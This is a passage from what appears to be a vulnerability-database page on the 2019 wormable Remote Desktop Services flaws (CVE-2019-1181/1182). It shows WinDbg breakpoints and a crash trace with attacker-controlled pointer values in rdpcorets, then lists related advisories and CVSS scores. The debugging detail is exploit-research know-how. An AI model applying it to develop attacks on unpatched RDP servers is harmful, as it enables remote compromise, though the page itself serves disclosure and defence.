  • rdpcorets+c9538 ".printf \"CRdpDynVC::Initialize\\n\"; g"

    • Watch object creation instances

  • msvcrt+1e00 ".printf \"operator new(size=%N)\", rcx; gu; .printf \" = %N\\n\", rax; g"

Read Access Violation

The following stack trace was taken during a RAV after having corrupted an object using the target memcpy call.

0:001> g
(138c.13b4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
rdpcorets+0xd9d36:
00007fff`a5b79d36 49895014        mov     qword ptr [r8+14h],rdx ds:41414141`41414155=????????????????
0:033> k
Child-SP          RetAddr           Call Site
00000050`beaaf478 00007fff`a5b79c7f rdpcorets+0xd9d36
00000050`beaaf480 00007fff`a5b7c3bf rdpcorets+0xd9c7f
00000050`beaaf4c0 00007fff`a5b91190 rdpcorets+0xdc3bf
00000050`beaaf5f0 00007fff`a5b90cb1 rdpcorets+0xf1190
00000050`beaaf690 00007fff`a5bf2893 rdpcorets+0xf0cb1
00000050`beaaf720 00007fff`c9ed13d2 rdpcorets!DllGetClassObject+0x75b3
00000050`beaaf7e0 00007fff`caf654f4 KERNEL32!BaseThreadInitThunk+0x22
00000050`beaaf810 00000000`00000000 ntdll!RtlUserThreadStart+0x34
0:033> u
rdpcorets+0xd9d36:
00007fff`a5b79d36 49895014        mov     qword ptr [r8+14h],rdx
00007fff`a5b79d3a 498d5028        lea     rdx,[r8+28h]
00007fff`a5b79d3e 41c7401038000000 mov     dword ptr [r8+10h],38h
00007fff`a5b79d46 4d89481c        mov     qword ptr [r8+1Ch],r9
00007fff`a5b79d4a 45894824        mov     dword ptr [r8+24h],r9d
00007fff`a5b79d4e 8d0c8510000000  lea     ecx,[rax*4+10h]
00007fff`a5b79d55 4803ca          add     rcx,rdx
00007fff`a5b79d58 44890a          mov     dword ptr [rdx],r9d
0:033> r
rax=0000000000000000 rbx=00007fffa5b79d10 rcx=00000050bf0c1940
rdx=0000000000000001 rsi=00000050bdcba9a0 rdi=00000050bf0c1940
rip=00007fffa5b79d36 rsp=00000050beaaf478 rbp=00000050bf0c7450
 r8=4141414141414141  r9=0000000000000000 r10=0000000000000007
r11=00000050beaaf4b8 r12=00000050bf0c1f40 r13=00000050bf0c23c0
r14=0000000000000000 r15=00000050bdccfdc0
iopl=0         nv up ei pl zr na po nc
cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246
rdpcorets+0xd9d36:
00007fff`a5b79d36 49895014        mov     qword ptr [r8+14h],rdx ds:41414141`41414155=????????????????

Assessed Attacker Value: 5
Assessed Attacker Value: 5Assessed Attacker Value: 3

Related

krebs 1
kaspersky 4
cisa 1
msrc 3
myhack58 1
talosblog 2
prion 5
thn 1
cve 5
openvas 10
huawei 1
mscve 3
symantec 2
checkpoint_advisories 1
mssecure 1
qualysblog 2
attackerkb 1
threatpost 1
securelist 1
mskb 11
nessus 10
avleonov 1
krebs
krebs
Patch Tuesday, August 2019 Edition
2019-08-13 21:57:13
kaspersky
kaspersky
KLA11697 RCE vulnerabilities in Microsoft Apps
2019-08-13 00:00:00
KLA11936 ACE vulnerability in Microsoft Dynamics
2020-08-12 00:00:00
KLA11989 Multiple vulnerabilities in Microsoft Products (ESU)
2019-08-13 00:00:00
cisa
cisa
Microsoft Releases Security Updates to Address Remote Code Execution Vulnerabilities
2019-08-14 00:00:00
msrc
msrc
Patch new wormable vulnerabilities in Remote Desktop Services (CVE-2019-1181/1182)
2019-08-13 07:00:00
Patch new wormable vulnerabilities in Remote Desktop Services (CVE-2019-1181/1182)
2019-08-13 17:07:13
Patch new wormable vulnerabilities in Remote Desktop Services (CVE-2019-1181/1182)
2019-08-13 07:00:00
myhack58
myhack58
Windows Remote Desktop Services remote command execution vulnerability, CVE-2019-1181/1182-a vulnerability warning-the black bar safety net
2019-08-14 00:00:00
talosblog
talosblog
The latest on BlueKeep and DejaBlue vulnerabilities — Using Firepower to defend against encrypted DejaBlue
2019-11-04 07:43:36
Microsoft Patch Tuesday — Aug. 2019: Vulnerability disclosures and Snort coverage
2019-08-14 09:55:35
prion
prion
Remote code execution
2019-08-14 21:15:00
Remote code execution
2019-08-14 21:15:00
Remote code execution
2019-08-14 21:15:00
thn
thn
4 New BlueKeep-like 'Wormable' Windows Remote Desktop Flaws Discovered
2019-08-13 18:22:00
cve
cve
CVE-2019-1226
2019-08-14 21:15:00
CVE-2019-1222
2019-08-14 21:15:00
CVE-2019-1182
2019-08-14 21:15:00
openvas
openvas
Huawei Data Communication: Four Remote Code Execution Vulnerability in Some Microsoft Windows Systems (huawei-sa-20190819-01-windows)
2020-06-05 00:00:00
Microsoft Windows Multiple Vulnerabilities (KB4512506)
2019-08-14 00:00:00
Microsoft Windows Multiple Vulnerabilities (KB4512488)
2019-08-14 00:00:00
huawei
huawei
Security Advisory - Four Remote Code Execution Vulnerabilities in Some Microsoft Windows Systems
2019-08-19 00:00:00
mscve
mscve
Remote Desktop Services Remote Code Execution Vulnerability
2019-08-13 07:00:00
Remote Desktop Services Remote Code Execution Vulnerability
2019-08-13 07:00:00
Microsoft Dynamics 365 for Finance and Operations (on-premises) Remote Code Execution Vulnerability
2020-08-12 07:00:00
symantec
symantec
Microsoft Windows Remote Desktop Services CVE-2019-1181 Remote Code Execution Vulnerability
2019-08-13 00:00:00
Microsoft Windows Remote Desktop Services CVE-2019-1182 Remote Code Execution Vulnerability
2019-08-13 00:00:00
checkpoint_advisories
checkpoint_advisories
Microsoft Remote Desktop Services Remote Code Execution (CVE-2019-1182)
2019-11-25 00:00:00
mssecure
mssecure
Mitigating vulnerabilities in endpoint network stacks
2020-05-04 16:00:25
qualysblog
qualysblog
Windows Remote Desktop Vulnerabilities (Seven Monkeys) – How to Detect and Patch
2019-08-13 23:58:15
August 2019 Patch Tuesday – 93 Vulns, 29 Critical, 7 Remote Desktop Vulns, Hyper-V, DHCP, Adobe vulns
2019-08-13 18:49:51
attackerkb
attackerkb
Insecure RDP
2020-10-09 00:00:00
threatpost
threatpost
Shades of BlueKeep: Wormable Remote Desktop Bugs Top August Patch Tuesday List
2019-08-13 20:29:10
securelist
securelist
IT threat evolution Q3 2019. Statistics
2019-11-29 10:00:19
mskb
mskb
August 13, 2019—KB4512482 (Security-only update)
2019-08-13 07:00:00
August 13, 2019—KB4512489 (Security-only update)
2019-08-13 07:00:00
August 13, 2019—KB4512488 (Monthly Rollup)
2019-08-13 07:00:00
nessus
nessus
KB4512482: Windows Server 2012 August 2019 Security Update
2019-08-13 00:00:00
KB4512486: Windows 7 and Windows Server 2008 R2 August 2019 Security Update
2019-08-13 00:00:00
KB4512489: Windows 8.1 and Windows Server 2012 R2 August 2019 Security Update
2019-08-13 00:00:00
avleonov
avleonov
Microsoft Patch Tuesday August 2020: vulnerabilities with Detected Exploitation, useful for phishing and others
2020-08-30 22:13:56

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

10 High

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:N/C:C/I:C/A:C

JSON
Related for AKB:3C6D4A84-B8EE-47A2-A1E9-388F5F32AD27
krebs1kaspersky4cisa1msrc3myhack581talosblog2prion5thn1cve5openvas10huawei1mscve3symantec2checkpoint_advisories1mssecure1qualysblog2attackerkb1threatpost1securelist1mskb11nessus10avleonov1